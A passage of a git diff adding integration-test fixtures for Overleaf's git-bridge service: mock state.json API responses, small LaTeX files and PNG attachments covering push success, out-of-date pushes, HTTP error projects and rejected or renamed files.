diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/state.json
new file mode 100644
index 0000000..fbe4670
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/state.json
@@ -0,0 +1,50 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:4003/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    },
+                    {
+                        "url": "http://127.0.0.1:4003/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410-copy.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410-copy.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410-copy.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410-copy.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/state.json
new file mode 100644
index 0000000..4b969e0
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/state.json
@@ -0,0 +1,80 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 2,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 2,
+                "comment": "i deleted the image",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:48:01.123Z"
+            },
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 2,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:4003/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    },
+                    {
+                        "url": "http://127.0.0.1:4003/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410-copy.png"
+                    }
+                ]
+            },
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:4003/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    },
+                    {
+                        "url": "http://127.0.0.1:4003/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410-copy.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/state.json
new file mode 100644
index 0000000..2850c9e
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/state.json
@@ -0,0 +1,46 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.333Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3866/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png",
+                        "path": "min_mean_wait_evm_7_eps_150dpi.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/state.json
new file mode 100644
index 0000000..0e8df4c
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/state.json
@@ -0,0 +1,29 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "test1@example.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 1
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneA4xxProject/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneA4xxProject/state/state.json
new file mode 100644
index 0000000..f8c76c1
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneA4xxProject/state/state.json
@@ -0,0 +1,18 @@
+[
+    {
+        "project": "gone",
+        "getDoc": {
+            "error": 410,
+            "versionID": 1,
+            "createdAt": "2018-02-05T15:30:00Z",
+            "email": "michael.walker@overleaf.com",
+            "name": "msw"
+        },
+        "getSavedVers": [],
+        "getForVers": [],
+        "push": "success",
+        "postback": {
+            "type": "outOfDate"
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAHasDotGitProject/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAHasDotGitProject/state/state.json
new file mode 100644
index 0000000..23bf520
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAHasDotGitProject/state/state.json
@@ -0,0 +1,19 @@
+[
+    {
+        "project": "conflict",
+        "getDoc": {
+            "error": 409,
+            "code": "projectHasDotGit",
+            "versionID": 1,
+            "createdAt": "2018-02-05T15:30:00Z",
+            "email": "michael.walker@overleaf.com",
+            "name": "msw"
+        },
+        "getSavedVers": [],
+        "getForVers": [],
+        "push": "success",
+        "postback": {
+            "type": "outOfDate"
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAMissingProject/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAMissingProject/state/state.json
new file mode 100644
index 0000000..1db62b0
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAMissingProject/state/state.json
@@ -0,0 +1,18 @@
+[
+    {
+        "project": "missing",
+        "getDoc": {
+            "error": 404,
+            "versionID": 1,
+            "createdAt": "2018-02-06T13:29:00Z",
+            "email": "michael.walker@overleaf.com",
+            "name": "msw"
+        },
+        "getSavedVers": [],
+        "getForVers": [],
+        "push": "success",
+        "postback": {
+            "type": "outOfDate"
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAProtectedProjectWithoutAuthentication/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAProtectedProjectWithoutAuthentication/state/state.json
new file mode 100644
index 0000000..859bc62
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAProtectedProjectWithoutAuthentication/state/state.json
@@ -0,0 +1,173 @@
+[
+    {
+        "project": "protected",
+        "getDoc": {
+            "error": 403,
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "contentchanged\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "outOfDate"
+        }
+    },
+    {
+        "project": "invalidFiles",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "changedñcontent\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "invalidFiles",
+            "errors": [
+                {
+                    "file": "file.invalid",
+                    "state": "error"
+                },
+                {
+                    "file": "virus.exe",
+                    "state": "disallowed"
+                },
+                {
+                    "file": "my image.jpg",
+                    "state": "unclean_name",
+                    "cleanFile": "my_image.jpg"
+                }
+            ]
+        }
+    },
+    {
+        "project": "invalidProject",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "invalidProject",
+            "errors": [
+                "No main.tex file exists."
+            ]
+        }
+    },
+    {
+        "project": "error",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "error"
+        }
+    }
+]
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/state.json
new file mode 100644
index 0000000..5a9742f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/state.json
@@ -0,0 +1,46 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.333Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3867/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png",
+                        "path": "min_mean_wait_evm_7_eps_150dpi.png"
+                    }
+                ]
+            }
+        ],
+        "push": "outOfDate",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/state.json
new file mode 100644
index 0000000..dbbe395
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/state.json
@@ -0,0 +1,65 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.333Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3869/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png",
+                        "path": "min_mean_wait_evm_7_eps_150dpi.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "invalidFiles",
+            "errors": [
+                {
+                    "file": "file1.invalid",
+                    "state": "error"
+                },
+                {
+                    "file": "file2.exe",
+                    "state": "disallowed"
+                },
+                {
+                    "file": "hello world.png",
+                    "state": "unclean_name",
+                    "cleanFile": "hello_world.png"
+                },
+                {
+                    "file": "an image.jpg",
+                    "state": "unclean_name",
+                    "cleanFile": "an_image.jpg"
+                }
+            ]
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/state.json
new file mode 100644
index 0000000..0746cf9
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/state.json
@@ -0,0 +1,49 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.333Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3870/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png",
+                        "path": "min_mean_wait_evm_7_eps_150dpi.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "invalidProject",
+            "errors": [
+                "project: no main file",
+                "The project would have no (editable) main .tex file."
+            ]
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
